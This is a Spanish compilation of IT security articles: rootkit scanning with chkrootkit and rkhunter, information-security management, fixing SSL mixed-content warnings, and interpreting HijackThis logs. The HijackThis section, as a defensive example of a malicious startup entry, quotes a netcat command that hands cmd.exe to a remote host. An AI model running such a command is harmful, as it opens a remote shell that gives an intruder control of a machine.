Zystяaж

autor: sergio.gonzalez.duran@gmail.com

De acuerdo a la definición en wikipedia un rootkit es una herramienta, o un grupo de ellas que tiene como finalidad esconderse a sí misma y esconder otros programas, procesos, archivos, directorios, llaves de registro, y puertos que permiten al intruso mantener el acceso a un sistema para remotamente comandar acciones o extraer información sensible, a menudo con fines maliciosos o destructivos.

De hecho que un hacker (black hat) te instale un root kit en tu equipo Linux es la máxima intrusión a la que estarías expuesto. Recuerda que en GNU/Linux el peligro no son virus como en el mundo Windows sino las vulnerabilidades que se descubren a diario en los muy distintos programas que usa el sistema. Por eso la importancia de verificar y actualizar lo más continuo posible el sistema en su totalidad.

En este artículo de LinuxTotal.com.mx te presento dos utilerías que te permitirán verificar tu equipo por posibles cambios en los archivos y programas más comunes, ya que ha menudo los rootkits se disfrazan como programas de uso muy comun como ls o ps, incluso conservan la misma funcionalidad (que es el objetivo, que el usuario no se entere que ya ha sido hackeado con un rootkit) pero a la vez de manera furtiva realizan su trabajo de ejecutar comandos remotos, abrir puertos, realizar ataques DoS, instalar servidores Web ocultos, utilizar ancho de banda para transferencia de archivos, monitorear con keylogers, etc., etc.

chkrootkit

chkrootkit muy popular checador de rootkits, verifica localmente por señales de estos. Es una buena opción para equipos Desktop, laptops, incluso para servidores como un complemento más de este tipo de programas.

Después de que lo descargues hay que compilarlo: (como root)

#> wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
#> tar xvzf chkrootkit.tar.gz
#> cd chkrootkit     (o el directorio donde se haya descomprimido)
#> make sense        (se compilan los fuentes en C)

Con lo anterior debes de tener ahora en el mismo directorio un binario llamado chkrootkit, se ejecuta sin argumentos de la siguiente manera:

#> ./chkrootkit 
ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `crontab'... not infected
Checking `date'... not infected
Checking `du'... not infected
Checking `dirname'... not infected
Checking `echo'... not infected
Checking `egrep'... not infected
Checking `env'... not infected
Checking `find'... not infected
...  
(varias líneas más de verificación de archivos, directorios y procesos)

Es posible ver la lista de pruebas que chkrootkit puede realizar mediante la opción -l y ejecutar solo una o varias a la vez:

#>./chkrootkit -l
./chkrootkit: tests: aliens asp bindshell lkm rexedcs sniffer w55808 
wted scalper slapper z2 chkutmp amd basename biff chfn chsh cron crontab 
date du dirname echo egrep env find fingerd gpm grep hdparm su ifconfig 
inetd inetdconf identd init killall  ldsopreload login ls lsof mail 
mingetty netstat named passwd pidof pop2 pop3 ps pstree rpcinfo rlogind 
rshd slogin sendmail sshd syslogd tar tcpd tcpdump top telnetd timed 
traceroute vdir w write
#> ./chkrootkit tar top         (verificamos solos dos pruebas)
ROOTDIR is `/'
Checking `tar'... not infected
Checking `top'... not infected

chkrootkit no tiene opción (al menos hasta la versión 0.48) para enviar a archivo el resultado del escaneo realizado, pero se resulve con direccionamiento:

#> ./chkrootkit >  chkrootkit20080414.txt

Puedes hacer un script donde se agregue la fecha automáticamente (ver Comando date, sus usos y respaldo de archivos) y a través de una entrada de cron ejecutarlo diariamente. Revisar y/o comparar esttos archivos diariamente te ayudarán a detectar cambios en tu sistema.

rkhunter

rkhunter en mi opinión, es un checador de rootkits mucho más completo y potente que chkrootkit, es ideal para ser usado en servidores. En su página de descarga sostiene (a modo de broma) que verifica en eun 99.9% que estás libre de indeseables rootkits, es decir, realmente se trata de una capa más de seguridad. rkhunter verifica el sistema por:

• Comparación de hashes MD5
• Busca por archivos comunes usados por rootkits
• Permisos equivocados para binarios
• Busca por cadenas de texto sospechosoas en módulos LKM (Loadable Kernel Modules) y KLD (Kernel Loadable Device)
• Busca por archivos ocultos
• Opciones de escaneo dentro de archivos binarios y planos

Después de descargar el tar.gz lo instalamos:

#> tar xvzf rkhunter-1.3.2.tar.gz
#> cd rkhunter                       (o el directorio donde se haya descomprimido)
#> ./installer.sh --layout default --show
PREFIX:             /usr/local
Application:        /usr/local/bin
Configuration file: /etc
Documents:          /usr/local/share/doc/rkhunter-1.3.2
Man page:           /usr/local/share/man/man8
Scripts:            /usr/local/lib/rkhunter/scripts
Databases:          /var/lib/rkhunter/db
Temporary files:    /var/lib/rkhunter/tmp

(lo que hice aqui fue mostrar previó a la instalación, 
donde quedarían la aplicación y demás con una instalación 'default')
(usa ./installer.sh para ver las opciones de la instalación)

(ahora si realizo la instalación)
#> ./installer.sh --layout default --install

Una vez instalado, la manera más básica de ejecutar rkhunter es asi:

#> rkhunter -c
[ Rootkit Hunter version 1.3.2 ]

Checking system commands...

  Performing 'strings' command checks
    Checking 'strings' command                               [ OK ]

  Performing 'shared libraries' checks
    Checking for preloading variables                        [ None found ]
    Checking for preload file                                [ Not found ]
    Checking LD_LIBRARY_PATH variable                        [ Not found ]

  Performing file properties checks
    Checking for prerequisites                               [ OK ]
    /bin/awk                                                 [ OK ]
    /bin/basename                                            [ OK ]
    /bin/bash                                                [ OK ]
    /bin/cat                                                 [ OK ]
    /bin/chmod                                               [ OK ]
    /bin/chown                                               [ OK ]
    /bin/cp                                                  [ OK ]
    /bin/csh                                                 [ OK ]
    /bin/cut                                                 [ OK ]
    /bin/date                                                [ OK ]
    /bin/df                                                  [ OK ]
  ....
  (varias líneas más)

rkhunter con la opción -c realiza un escaneo muy completo del sistema, no es posible apreciarlo aqui, pero en cada sección del escaneo la salida se interrumpe como para poder analizarlo, y hasta que no se presiones ‘Enter’ continua. Puedes deshacerte de este comportamiento interactivo con la opción –sk, por cierto, la lista de opciones o ayuda, la obtienes invocando rkhunter sin ningún argumento.

Si hubiera algo que reportar, el archivo /var/log/rkhunter.log, pero puedes cambiar la salida del archivo a otro que tu desees:

#> rkhunter -c --sk --logfile /root/rkhunter20080414.txt

Lo anterior enviará toda la salida al archivo indicado y sin hacer pausas para continuar. También es posible realizar pruebas personalizadas y no todas a la vez.

#> rkhunter --list   (lista de pruebas posibles)
Available test names:
    additional_rkts all apps attributes deleted_files filesystem
    group_accounts group_changes hashes hidden_procs immutable known_rkts
    local_host malware network none os_specific other_malware
    packet_cap_apps passwd_changes ports possible_rkt_files possible_rkts possible_rkt_strings
    promisc properties rootkits running_procs scripts shared_libs
    shared_libs_path startup_files startup_malware strings suspscan system_commands
    system_configs trojans

Grouped test names:
    additional_rkts => possible_rkt_files possible_rkt_strings
    group_accounts  => group_changes passwd_changes
    local_host      => filesystem group_changes passwd_changes startup_malware system_configs
    malware         => deleted_files hidden_procs other_malware running_procs suspscan
	...
(varias líneas más)

#> rkhunter --enable hidden_procs,system_commands   
(se ejecutan solo las pruebas deseadas)

#> rkhunter --disable system_commands   (lo contrario, se 
ejecutan todas las pruebas menos 
la indicada(s))

Como ya se mencionó previamente, es conveniente que se ejecute periódicamente a través de un cron y con un control por fechas de los reportes que se generan, asi se teendrá una bitacora muy completa de cuando pudieron ocurrir cambios en el sistema.

También, recuerda que estos anti-rootkits son solo una medida de seguridad más para la protección de tu sistema, hay que actualizar continuamente, apagar los servicios que no se usen, configurar adecuadamente ssh, apache, servidores de correo, etc.

Fuente: http://www.linuxtotal.com.mx/index.php?cont=info_seyre_011

Hace tiempo cuando empecé a abordar el tema de la seguridad informática cometí el error de pensar que la seguridad en una organización podía lograrse con una gran cantidad de herramientas y elementos técnicos. El tiempo, la experiencia y la permanente capacitación me han demostrado cuan equivocado estaba y es por eso que he decidido volcar en estas líneas algunos argumentos que ayuden a aquellos que recién comienzan a no cometer los mismos errores.

En el mundo actual la INFORMACIÓN es el elemento primordial de cualquier organización y por ende la SEGURIDAD DE LA INFORMACIÓN (SI) es un asunto tan importante como la información misma, pues afecta directamente a la organización o a individuos de la misma.

Como aprendimos en la escuela siempre que hay un proceso de comunicación los elementos que intervienen son: la información transmitida, el emisor, el medio por el cual se transmite y el receptor.
Si acordamos en llamar ACTIVOS a estos elementos entonces, podremos identificar lo que la SI debe proteger:

• a información
• los equipos que la soportan
• las personas que la utilizan

El primer paso para abordar el tema de la SI es reconocer los RIESGOS a los que están expuestos esos activos y el impacto que esto origina a los objetivos de la organización.

Actualmente existen infinidad de legislaciones, políticas, normas, metodologías y herramientas que dan soporte a la SI y que pueden ser libremente utilizadas por las organizaciones a fin de ordenar la gestión de la seguridad.

Algunas de estas normas simplemente buscan la normalización de las tareas, como es el caso de la ISO 17799, y otras tienen como objetivo la certificación internacional en estos temas, como la ISO-9001 o la BS-7799.

Más allá de cual sea el criterio aplicado, incluso puede ser uno propio, llegaremos a que todas las etapas se pueden resumir en el concepto que la SI tiene como objetivo preservar:

• CONFIDENCIALIDAD: la información debe ser accesible sólo a aquellas personas autorizadas a tal fin.
• INTEGRIDAD: la información y sus métodos de procesamiento deben ser completos y exactos.
• DISPONIBILIDAD: la información y sus recursos relacionados deben estar disponibles cada vez que se los requiera.

Para lograr estos objetivos es fundamental contar con el acuerdo y compromiso de todos los involucrados, ser acordes y estar alineados a los objetivos generales de la organización.

Así, es más que claro que la seguridad que puede lograrse por medios técnicos es limitada y debe ser respaldada por una gestión, política y procedimientos adecuados que consideren a las personas como el primer eslabón, y generalmente el más débil, de una compleja cadena de responsabilidades.

Abordar el problema de minimizar (o eliminar) estos riegos es un gran desafío pero lograremos un gran avance con tan solo organizar la gestión, aprovechar las opciones de seguridad de los sistemas utilizados, aprender a eliminar las configuraciones por defecto, utilizar herramientas licenciadas (o libres) y aprovechar la experiencia y base de conocimientos de aquellos que ya han superado exitosamente este desafío.

La evaluación de riesgos y, en general, las mejoras en la gestión de la SI puede aplicarse a toda la organización o solo a partes de la misma.

Para evaluar los riesgos se deben tener en cuenta las consecuencias (impacto potencial de una falla) y la probabilidad de que dicha falla ocurra. Estas fallas generalmente serán el producto de las amenazas y vulnerabilidades existentes y, los controles implementados para minimizarlas.

Una vez identificados los riesgos que enfrenta la organización y que atentan contra las tres propiedades deseables de la Información, deberemos establecer los requerimientos mínimos de seguridad deseados.

Para ellos deberemos analizar los riesgos identificados, los requisitos externos (leyes, contratos, reglamentaciones, etc.) y los requisitos internos que ha desarrollado la organización para respaldar sus operaciones (métodos de procesamiento de la información, normas, procesos, etc.).

La selección de los controles a implementar puede hacerse sobre normativas y estándares existentes o diseñarse nuevos en base a la experiencia y necesidades a satisfacer. Luego de evaluar los controles se tendrá un costo estimado de implementación que deberá contrastarse con los costos de asumir los riesgos.

Una vez seleccionados los controles a realizar para minimizar los riesgos identificados se deberá contar con un método de medición adecuado que nos permita establecer fehacientemente que dichos controles son efectivos habiendo logrado los resultados esperados.

Por último esta metodología deberá ser revisada periódicamente para identificar nuevos riesgos y controles a implementar. Así, habremos logrado un metodología de MEJORA CONTINUA en materia de SI que puede resumirse como:

Lo que es monitoreado, puede ser medido, y lo que es medido puede ser gestionado. En este proceso es vital la correcta definición de los indicadores de desempeño.

Según el Modelo de Shewhart-Deming de Mejora Continua citado anteriormente

(PHVA = Planificar-Hacer-Verificar-Actuar o PDCA = Plan-Do-Check-Act en inglés), estos indicadores nos dirán si:

• lo que se Planeo se implementó (Planificación -> Implementación)
• lo que se Implementó se revisó (Implementación -> Verificación)
• lo que se Revisó se mantuvo y se mejoró (Verificación -> Acción)

Recordemos que el objetivo de la mejora continua debe ser soportado por un proceso de gestión y no por un proceso tecnológico.

Al ser este un proceso largo y tedioso, la política de seguridad podrá ser llevada a la práctica de la mejor manera posible siempre y cuando se definan claramente las tareas a realizar y el plan de acciones asociado. Para esta etapa es recomendable dividir estas tareas en:

• Establecer objetivos y alcance de la política. La misma no necesariamente debe alcanzar toda la organización.
• Clasificar, identificar y valorar los riesgos. Decidir las acciones a tomar sobre los riesgos.
• Seleccionar los controles a implementar para mitigar los riesgos.
• Formular un plan concreto de las acciones a realizar.
• Capacitar.
• Implementar los controles.
• Realizar revisiones y mediciones para verificar la efectividad de los controles implementados.
• Implementar mejoras sobre el modelo actual.

Por supuesto, y como ya se ha mencionado esta política debe llevarse a cabo con el respaldo y compromiso de la dirección, teniendo en cuenta que muchos de los controles implementados serán efectivos solamente con una adecuada capacitación de todos los involucrados.

Sea cual sea la metodología aplicada y la forma de llevarla a cabo esta debe ser:

• Medible: puede ser auditada por una tercera parte independiente.
• Replicable: en la medida en que el sistema es formal y contiene procesos estructurados facilitará la replicación del sistema en otro lugar.
• Escalable: los procesos y controles establecidos pueden ser desarrollados centralmente y luego distribuídos o bien, incorporarse nuevos procesos .

Fuente: http://www.segu-info.com.ar/
Autor: Lic. Cristian F. Borghello

Cuando trabajamos con páginas SSL es bastante molesto encontrarse con un mensaje del navegador indicando que “La página Web que está abriendo contiene elementos seguros como no seguros. ¿Desea mostrar los elementos no seguros?”

Este mensaje además de molesto – sale siempre – resulta cuanto menos “inquietante” y puede provocar que más de un usuario salga inmediatamente de nuestro sitio Web. Algo especialmente grave si se trata de un sitio web dedicado a la venta online.

¿Como evitarlo?. Para responder a esta pregunta lo primero que debemos saber en porque se está produciendo. Este mensaje se muestra cuando dentro de un entorno SSL (protocolo https) existe alguna petición http. Es decir, en nuestra página hay elementos apuntado a una URL absoluta con protocolo http. Estos elementos pueden ser imagenes, scripts, css …

Un ejemplo claro es cuando incluimos una pelicula flash en nuestra página, por defecto, el enlace incluye una redirección a la página de adobe para descargar el reproductor en el caso de que no lo tengamos instalado. Ese enlace es absoluto a través de http – por lo que provoca el molesto error.

Este sería un enlace a una pelicula flash tipico:

 

<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" 

codebase="http://download.macromedia.com/.../swflash.cab#version=5,0,0,0" 

width="516" height="76" id="ShockwaveFlash1">

	<param name="movie" value="mipelicula.swf"/>

	<param name="quality" value="high"/> 

	<param name="bgcolor" value="#000000"/>

</object> 

Este enlace no muestra ningún error cuando estamos sobre un entorno http – tipicamente el entorno de desarrollo -, pero cuando pasamos a un entorno https – producción – muestra el mensaje debido al enlace http://download.macromedia.com/…/swflash.cab#version=5,0,0,0 que contiene.

En este caso la solucion es sencilla, bastará con quitar el enlace http la etiqueta.

 

<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" 

width="516" height="76" id="ShockwaveFlash1">

	<param name="movie" value="mipelicula.swf"/>

	<param name="quality" value="high"/> 

	<param name="bgcolor" value="#000000"/>

</object>

Pero no siempre es tan fácil solucionar el error. Cuando no podemos o no queremos eliminar el enlace – por ejemplo un javascrit – tendremos que recurrir a otros métodos.

Por ejemplo, cuando utilizamos Google Analytics, tenemos que incluir el siguiente script en nuestra página.

	<script src="http://www.google-analytics.com/urchin.js" 

		type="text/javascript"></script>

En este caso necesitaremos programar una página intermedia – que se trasmita por https – y que realice la solicitud a la dirección http y devuelva el mismo contenido. En nuestro caso, utilizamos ASP.NET por lo que nuestra página es aspx – pero la idea es válida para cualquier entorno web php, jsp, RoR …

 

	<script src="GetScript.aspx" 

		type="text/javascript"></script>

Y nuestra página GetScript.aspx (debemos incluir una directiva using System.Net;):

 

 protected void Page_Load(object sender, EventArgs e)

 {

	string httpUrl = "http://www.google-analytics.com/urchin.js";

	WebRequest httpRequest = WebRequest.Create(httpUrl);

	WebResponse httpResponse = httpRequest.GetResponse();

	System.IO.Stream webStream = httpResponse.GetResponseStream();

	System.IO.StreamReader reader = 

		new System.IO.StreamReader(webStream );

	string html = reader.ReadToEnd();

	

	Response.Write(html); 

 }

En el caso de que la conexion salga a través de un servidor proxy:

 

 protected void Page_Load(object sender, EventArgs e)

 {

	string httpUrl = "http://www.google-analytics.com/urchin.js";

	WebRequest httpRequest =WebRequest.Create(httpUrl);

	

	// En el caso de utilizar un servidor proxy

	IWebProxy proxy = WebRequest.GetSystemWebProxy();

	if (proxy != null && proxy.Credentials != null)

	{

		httpRequest.Proxy = proxy; 

	}

	else

	{

		proxy = new WebProxy("<servidor proxy>:<puerto>");

		NetworkCredential credenciales = 

			new NetworkCredential("<usuario>", "<clave>");

		proxy.Credentials = credenciales;

		httpRequest.Proxy = proxy;

	}

	WebResponse httpResponse = httpRequest.GetResponse();

	System.IO.Stream webStream = httpResponse.GetResponseStream();

	System.IO.StreamReader reader = 

		new System.IO.StreamReader(webStream);

	

	string html = reader.ReadToEnd();

	Response.Write(html); 

 }

Finalmente, si lo que queremos es “rizar el rizo”, en lugar de utilizar una página – que entre otros inconveniente tiene que ejecuta su ciclo de vida completo – sería mejor utilizar un manejador http.

Para eso, creamos nuestro propio manejador de peticiones como se muestra a continuación.

 

<%@ WebHandler Language="C#" Class="Handler" %>

 

using System;

using System.Web;

using System.Net;

 

public class Handler : IHttpHandler {

 public void ProcessRequest (HttpContext context) 

 {

	context.Response.ContentType = "text/javascript";

	context.Response.Write(GetData()); 

 }

 private string GetData()

 {

	string httpUrl = "http://www.google-analytics.com/urchin.js";

	WebRequest httpRequest = WebRequest.Create(httpUrl);

	// En el caso de utilizar un servidor proxy

	IWebProxy proxy = WebRequest.GetSystemWebProxy();

	if (proxy != null && proxy.Credentials != null)

	{

		httpRequest.Proxy = proxy;

	}

	else

	{

 

		proxy = new WebProxy("<servidor proxy>:<puerto>");

		NetworkCredential credenciales = 

			new NetworkCredential("<usuario>", "<clave>");

		proxy.Credentials = credenciales;

		httpRequest.Proxy = proxy;

	}

	WebResponse httpResponse = httpRequest.GetResponse();

	System.IO.Stream webStream = httpResponse.GetResponseStream();

	System.IO.StreamReader reader = 

		new System.IO.StreamReader(webStream);

	string html = reader.ReadToEnd();

	

	return html;

 }

public bool IsReusable 

 {

	get {

	return false;

	}

 }

}

Luego definimos una extension de archivo – en nuestro caso jsx – , incluimos el manejador en el web.config y cambiamos el enlace de la página para que apunte a un recurso .jsx

 

 <httpHandlers> 

	<add verb="GET" path="*.jsx" validate="false" type="Handler"/>

 </httpHandlers>

	<script src="GetScript.jsx" type="text/javascript"></script>

Saludos,

Fuente: http://www.devjoker.com/contenidos/Articulos/410/La-p%C3%A1gina-Web-que-est%C3%A1-abriendo-contiene-tanto-elementos-seguros-como-no-seguros.aspx

Cuando se eliminan uno o varios archivos el sistema los almacena en la papelera de reciclaje, usando del mismo modo espacio en nuestro disco duro. Para no enviar los archivos a la papelera para tener que vaciarla cada vez que nos acordemos o lo necesitemos podemos eliminarlos directamente del siguiente modo:
1. Selecciona el fichero o ficheros que querais borrar.
2. Mientras tenemos pulsada la tecla SHIFT pulsamos SUPR.
3. Responde a la pregunta que te hace Windows, evidentemente con un SI.

Funciona en todos los sistemas operativos de Windows

Fuente: http://www.configurarequipos.com/truco113.html

Índice:
1. ¿Qué es Hijackthis y para qué nos sirve?
2. Instalación de Hijackthis y otras herramientas a utilizar.
3. Sacando nuestro Log.
4. Analizando logs.
5. Solucionando problemas.

Una vez descargado y con todos los programas cerrados procedemos a ejecutar la nueva instalación automatizada que no traían versiones anteriores.
Elegimos la ruta de instalación y aceptamos el contrato. Automáticamente se abrirá Hijackthis y se añadirá un icono de acceso directo en nuestro escritorio.
Después de esta secuencia de pasos, se verá una imagen así:

A continuación analizaremos su salida.

F0, F1, F2, F3: Programas cargados a partir de ficheros  *.ini (system.ini, win.ini)

N1, N2, N3, N4: las URL de paginas de inicio/búsqueda de Netscape o Firefox.

O1: Redirecciones mediante aviso del fichero HOSTS.

O2: BHO (Browser Help Object); Son plugins para aumentar la funcionalidad de Internet, pero también pueden ser spywares.

O3: Toolbars del IE. (Internet Explorer).

O4: Aplicaciones que cargan en el inicio automático de Windows, ya sea desde el registro o desde la carpeta Inicio.

O5: Son las opciones de IE no visibles desde el panel de control de Windows.

O6: Acceso restringido por el Administrador a las opciones de IE.

O7: Acceso restringido por el Administrador al Registro.

O8: Elementos encontrados en el menú contextual del IE.

O9: Botones adicionales que se encuentran en la barra de herramientas de IE. Ej. : Flasget, DAP, Encarta, etc.

O10: Winsock Hijackers.

O11: Adición de un grupo extra en las opciones avanzadas de IE.

O12: Plugins para IE.

O13: Hijack del prefijo en IE.

O14: Hijack de la configuración por defecto del IE.

O15: Sitios no autorizados en la zona segura configurada por IE.

O16: Objetos ActiveX.

O17: Hijack del Dominio / Lop.com

O18: Protocolos extra / Hijack de estos.

O19: Hijack de la hoja de estilo del Usuario

O20: Valores del registro auto ejecutables AppInit_DLLs.

O21: Llaves del registro auto ejecutables ShellServiceObjectDelayLoad.

O22: Llaves del registro auto ejecutables SharedTaskSheduler.

O23: Servicios.

Aquí, están detallados cada uno de los componentes. Ahora veremos, como podemos corregir algún problema a raíz de lectura de estos indicadores.

5. Solucionando problemas del sistema con Hijackthis.

Grupo de R0, R1, R2, R3.
En este caso, si las URL que aparecen aquí han sido configuradas por nosotros no habrá problema y las dejamos como están.
Pero, si estas no han sido puestas por nosotros, tienen direcciones muy extensas y no las conocemos la marcamos y damos a Fix Checked.

Ejemplo Bueno:

R0 - HKCU\Software\Microsoft\Internet Explorer\Main, Start Page = www.google.com.ar

Ejemplo Malo:

R1 - HKCU\Software\Microsoft\Internet Explorer\Main, Search Bar =  res://C:\WINDOWS\TEMP\se.dll/sp.html

NOTA: R2, ya no es utilizado.

Siguiendo con R3:
R3 es la referencia usada por Search Hook. Si introducimos manualmente una URL como pagina de inicio sin especificar un protocolo (http: //, ftp://) el navegador tratara de encontrar uno automático y en caso de que no lo logre, acudirá a URL Search Hook.

Ejemplo Bueno:
R3 – Default URLSearchHook is missing

Ejemplo Malo, marcar y dar a ‘Fix Checked’

R3 - URLSearchHook: (no name) - _ {CFBFAE00-17A6-11D0-99CB-00C04FD64497} - (no file)

F0: Según las fuentes que he consultado es recomendable que si se encuentra una línea que comience con F0, marcarla y darle a continuación a Fix Checked.

F1: Programas antiguos utilizados por Win 3.1/95/98 que viene adjuntado en el archivo win.ini en las claves Run= y Load=. En este caso debemos buscar información antes de marcar y dar a Fix Checked.

F2 y F3: Son lo mismo que los anteriores, pero usan el núcleo NT, estoy hablando de Windows NT/2000/XP, que no usan del mismo modo a los archivos de inicio: system.ini y win.ini ya nombrados anteriormente.
Algunos ejemplos de referencia:

HKLM\Software\Microsoft\Windows NT\CurrentVersion\IniFileMapping
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit=[**]\system32\userinit.exe,[**]\moralla.exe

Si bajo Win NT encuentran el valor por defecto: userinit,nddeagnt.exe, es normal bajo ese sistema. Pero cualquier otro ejecutable es altamente probable que se trate de spyware y/o troyano.

URL’s de páginas de inicio/búsqueda en Netscape/Mozilla.

N1: Se refiere a la página de inicio y motor de búsqueda de Netscape 4
N2: Se refiere a la página de inicio y motor de búsqueda de netscape 6
N3: Se refiere a la página de inicio y motor de búsqueda de Netscape 7.
N4: Corresponde a la página de inicio y motor de búsqueda de Mozilla Firefox.

Se encuentran comúnmente en los archivos : prefs.js.

NOTA:
Actualmente el mayor porcentaje de spywares, malwares, Hijackers están hechos para IE y no para Mozilla,Netscape o Opera, por lo qué estos se mantienen un poco más a salvo que el IE mencionado anteriormente.

Qué hace el archivo Hosts?.
El archivo Hosts, funciona como una especie de convertidor o el encargado de establecer las relaciones entre Dirección IP y Hostnames.

127.0.0.1 www.google.com

Si tratas de ir a www.google.com, revisará el archivo hosts, verá la entrada y la convertirá a la dirección IP 127.0.0.1.
En este cuadro, verás las rutas de instalación por defecto del archivo Hosts:

Si ves entradas como las mostradas arriba y no hay una razón específica por la cuál sepas que deban estar ahí, puedes borrarlas con seguridad.

Si ves que el archivo hosts está localizado en C:\Windows\Help\hosts, eso significa que estás infectado con el CoolWebSearch. Si notas que el archivo hosts no está en su ruta por defecto de tu sistema operativo entonces, en el escaneo de Hijackthis, marca la entrada y dale Fix Checked u otro programa que limpie el archivo Hosts.

Si no eres un usuario muy avanzado en Hijackthis y no quieres complicarte, puedes usar el programa Hoster, el cual permite restaurar el archivo hosts a su configuración por defecto en tu sistema.
Para hacer esto, baja el programa Hoster desde aquí : Descargar Hoster. Ejecútalo, una vez abierto, pulsa en el botón “Restore Original Host” y una vez hecho esto cierra el Hoster.

Ejemplo de BHO Real:

BHO: NAV Helper - - C:\Program Files\Norton Antivirus\NavShExt.dll

Para arreglar este tipo de entradas, podemos consultar una lista como ésta, alojada en Sysinfo. Se puede consultar aquí: http://sysinfo.org/bholist.php

Cuando estemos consultando la lista, debemos hacer énfasis en el CLSID, que es el número entre las claves en la lista. El CLSID en el listado hacen referencias a entradas del registro que contienen información acerca de los BHO.

Una vez, detectadas las entradas malignas procederemos a marcarlas y darle “Fix Checked”. Pero, en ese momento Hijackthis querrá cerrarlas al instante y no podrá hacerlo, ya que estarán en uso.
En este caso lo que deberemos hacer es entrar en modo Seguro con la tecla F8 antes que inicie el sistema y borrarlo manualmente.

Éstas se encuentran en la siguiente llave del registro:

HKLM\SOFTWARE\Microsoft\Intenet Explorer\Toolbar

Ejemplo:

Toolbar: Norton Antivirus - - C:\Program Files\Norton Antivirus\NavShExt.dll

Si estas entradas, no están aceptadas por ti o no reconoces sus nombres puedes consultar la lista de Sysinfo que está en el grupo anterior, para encontrar la entrada y ver si sirve en tu sistema o no. Si es algo que no quieras en tu sistema, puedes borrarlo con tranquilidad, como antes lo hacíamos: Marcando la entrada y clic en Fix Checked.
En este grupo, sucede lo mismo que en el grupo anterior. Hijackthis intentará borrar las entradas seleccionadas pero no será posible borrar algunas, tendrás qué entrar en modo seguro para borrarlas manualmente.

- Las llaves del registro, donde se pueden alojar estas aplicaciones son estas:

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce 
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce 
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices 
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices 
HKLM\Software\Microsoft\Windows\CurrentVersion\Run 
HKCU\Software\Microsoft\Windows\CurrentVersion\Run 
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx 
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

NOTA : HKLM = HKEY_LOCAL_MACHINE – HKCU = HKEY_CURRENT_USER.

Se pueden distinguir dos carpetas donde se pueden iniciar las aplicaciones:

Startup: C:\Documents and Settings\USERNAME\Start Menu\Programs\Startup -> Usuario en particular.
Global: C:\Documents and Settings\All Users\Start Menu\Programs\Startup – > Apunta a todos los usuarios.

Cuando arreglas las entradas O4, HijackThis no borrará los archivos asociados con esta entrada. Deberás borrarlos manualmente, usualmente reiniciando lo máquina y entrando en modo seguro. Las entradas Global Startup y Startup trabajan un poco diferente. HijackThis borrará los accesos directos en esas entradas, pero no los archivos a los que apuntan. Si un ejecutable actual reside en los directorios Global Startup o Startup entonces será borrado.

Ejemplo de aplicación legítima:

HKLM\...\Run: [winamp] “C:\Winamp\winamp.exe” / (puede ir algún argumento)

Posible ejemplo de aplicación maliciosa:

HKLM\...\Run : [**] “nc –vv 210.x.x.x –e cmd.exe”

Puedes consultar algunas de estas listas de Startups legítimos para poder consultar tu Log y ver si las aplicaciones que inician con tu sistema son verdaderas o en un peor caso: troyanos, spywares o hijackers.
Estas listas te pueden servir:
http://www.answersthatwork.com/Tasklist_pages/tasklist.htm
http://greatis.com/regrun3appdatabase.htm
http://www.sysinfo.org/startuplist.php
http://www.pacs-portal.co.uk/startup_content.php#THE_PROGRAMS
http://www.kephyr.com/filedb/index.php
http://www.liutilities.com/products/wintaskspro/processlibrary/

Ejemplo: Archivo: control.ini: inet.cpl=no. Esto oculta las opciones de IE en el Panel de Control.

Si en el Log, encuentras una línea como esta y no esta puesta por ti o por otra persona de tu confianza o qué maneje el sistema, es signo de que una aplicación maliciosa esta intentando bloquear o dificultar la modificación de las opciones de IE. También puede ser una restricción puesta por algún software Anti-Spyware como SpyBot o Adware, en este último caso puedes dejarlo con tranquilidad, de lo contrario puedes utilizar Hijackthis para corregirlo.

Ejemplo :-

HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions

Estas opciones sólo son bloqueadas si el administrador lo ha hecho o por casualidado  o por uso personal se ha activado la función de Bloquear las opciones de IE desde el panel “Inmunizar” del software antispyware SpyBot: Search & Destroy.

Llave del Registro:

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System

Ejemplo de Lista O7 -

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System:
DisableRegedit=1

NOTA: En algunos casos, los administradores de determinados lugares, como cyber, empresas u otros sitios, bloquean el acceso al regedit para que no se modifique alguna configuración. Pero al ver esto, en tu sistema y no fue puesto por tí, puedes usar Hijackthis para borrarlo con tranquilidad.

Esto significa que verás las opciones que normalmente ves cuando das click derecho en alguna página web que estés viendo en tu navegador.

Llave del Registro: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt

Ejemplo de Lista O8 -

Extra context menu item: &Google Search -
res://c:\windows\GoogleToolbar1.dll/cmsearch.html

El listado para estas entradas mostrará los objetos que aparecen en el menú contextual cuando das click derecho, y qué programa es usado cuando das click en esa opción. Algunas, como “Browser Pal” deberían ser borradas siempre, y el resto deberías buscarlas en Google antes de hacer cualquier cosa. Un ejemplo de un programa legítimo que podríamos encontrar ahí sería la Google Toolbar.

Cuando arregles este tipo de entradas, HijackThis no borrará los archivos que vienen mencionados en la lista. Es recomendable que reinicies en modo seguro como en casos anteriores y borres esos archivos y/o carpetas de la toolbar mencionada.

Llave del Registro: HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensiones

Ejemplo de la Lista O9 -

Extra Button: AIM (HKLM)

Si no necesitas estos botones o los ítems del menú o los reconoces como malwares, puedes arreglarlas con seguridad.
